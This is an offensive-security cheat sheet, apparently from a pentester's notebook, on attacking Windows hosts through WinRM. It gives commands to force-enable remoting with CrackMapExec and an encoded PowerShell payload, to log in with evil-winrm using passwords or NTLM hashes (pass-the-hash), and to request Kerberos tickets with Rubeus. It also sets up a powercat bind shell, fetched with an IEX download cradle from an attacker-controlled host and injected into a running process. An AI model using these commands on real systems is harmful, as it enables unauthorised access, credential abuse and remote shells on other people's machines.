| description |
|---|
Windows Remote Management |
- https://www.bloggingforlogging.com/2018/01/24/demystifying-winrm/
- https://www.powershellmagazine.com/2014/03/06/accidental-sabotage-beware-of-credssp/
- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/network-vs-interactive-logons
- https://book.hacktricks.xyz/pentesting/5985-5986-pentesting-winrm
Using PowerShell (takes ~1m to be applied):
PS > Enable-PSRemoting -Force
PS > Set-Item wsman:\localhost\client\trustedhosts *
Remotely with CME:
$ cme smb 10.10.13.37 -u snovvcrash -p 'Passw0rd!' -x 'powershell -enc RQBuAGEAYgBsAGUALQBQAFMAUgBlAG0AbwB0AGkAbgBnACAALQBGAG8AcgBjAGUAOwBTAGUAdAAtAEkAdABlAG0AIAB3AHMAbQBhAG4AOgBcAGwAbwBjAGEAbABoAG8AcwB0AFwAYwBsAGkAZQBuAHQAXAB0AHIAdQBzAHQAZQBkAGgAbwBzAHQAcwAgACoACgA=' --no-output
PS > winrm get winrm/config
PS > winrm set winrm/config/client '@{TrustedHosts="*"}'
PS > $sess = New-PSSession -ComputerName 192.168.11.1 -Credential $cred
PS > Enter-PSSession -Session $sess
PS > Copy-Item .\file.txt -Destination "C:\users\administrator\music\" -ToSession $sess
Basic syntax:
$ evil-winrm -u '[MEGACORP\]snovvcrash' -p 'Passw0rd!' -i 10.10.13.37 -s `pwd` -e `pwd`
$ evil-winrm -u '[MEGACORP\]snovvcrash' -H fc525c9683e8fe067095ba2ddc971889 -i 10.10.13.37 -s `pwd` -e `pwd`
{% hint style="info" %}
Always use full username when authenticating as a domain user, because if there're 2 users sharing the same name (a local user and a domain user), say WORKGROUP\Administrator and MEGACORP\Administrator, and you're trying to authenticate as a domain admin without providing the domain prefix, authentication will fail.
{% endhint %}
Execute a .NET binary:
*Evil-WinRM* PS > Invoke-Binary Rubeus.exe "asktgt, /domain:megacorp.local, /user:snovvcrash, /rc4:fc525c9683e8fe067095ba2ddc971889, /nowrap"
Spawn interactive bind shell with powercat.ps1 and Invoke-PSInject.ps1:
$ sed -i s/powercat/pwcat/g pwcat.ps1
$ echo 'powercat -l -p 1337 -e cmd.exe' >> pwcat.ps1
$ echo 'IEX(New-Object Net.WebClient).DownloadString(''http://10.10.13.37/pwcat.ps1'')' | iconv -t UTF-16LE | base64 -w0
*Evil-WinRM* PS > Get-Process
*Evil-WinRM* PS > Invoke-PSInject.ps1
*Evil-WinRM* PS > Invoke-PSInject -ProcId <PID> -PoshCode <BASE64_CMD>
$ rlwrap nc 192.168.1.11 1337
$ pwsh
PS > $sess = New-PSSession -ComputerName 192.168.11.1 -Credential $cred -Authentication Negotiate
PS > Enter-PSSession -Session $sess